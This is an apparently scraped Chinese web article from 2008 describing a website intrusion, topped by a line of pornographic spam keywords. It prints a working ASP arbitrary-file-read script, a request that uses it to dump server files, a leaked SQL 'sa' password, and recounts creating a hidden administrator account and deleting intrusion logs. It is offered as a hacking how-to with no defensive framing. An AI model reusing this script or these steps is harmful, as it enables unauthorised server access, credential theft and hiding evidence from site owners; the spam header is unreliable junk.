亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

黑客是如何突破一流檢測(cè)系統(tǒng)的

互聯(lián)網(wǎng)   發(fā)布時(shí)間:2008-10-08 19:38:30   作者:佚名   我要評(píng)論
攻擊目標(biāo):www.***.com 測(cè)試過(guò)的動(dòng)作,一句話(huà)?cǎi)R,加密馬,等。 測(cè)試結(jié)果:無(wú)效,無(wú)法上傳,無(wú)法進(jìn)入系統(tǒng)。 經(jīng)過(guò)2天的分析, 然后自己搞出了一個(gè)代碼,利用此代碼讀取了該網(wǎng)站下的config.asp文件源代碼 --------------------------------------------------
攻擊目標(biāo):www.***.com
測(cè)試過(guò)的動(dòng)作,一句話(huà)?cǎi)R,加密馬,等。
測(cè)試結(jié)果:無(wú)效,無(wú)法上傳,無(wú)法進(jìn)入系統(tǒng)。
經(jīng)過(guò)2天的分析,
然后自己搞出了一個(gè)代碼,利用此代碼讀取了該網(wǎng)站下的config.asp文件源代碼 ------------------------------------------------------------------------- <%
file=Request("file")
Set FSOOBJ=Server.CreateObject("Scripting.FileSystemObject")
if FSOOBJ.fileExists(file) then
Set myfile=FSOOBJ.opentextfile(file,1)
Response.write "<pre>" & server.HTMLEncode(myfile.readall) &"</pre>"
myfile.close
Set myfile=nothing
else
Response.write "file(" & file & ") not exists."
end if
%>
------------------------------------------------------------------------- http://www.***.com/view.asp?file=D:\wwwroot\index.asp 讀取到的敏感內(nèi)容
sql地址:***.***.***.***
帳號(hào):sa 密碼:u8f2444f 利用此帳號(hào)進(jìn)入后,建立了123$的隱藏管理員用戶(hù),刪除入侵日志后退出。

相關(guān)文章

最新評(píng)論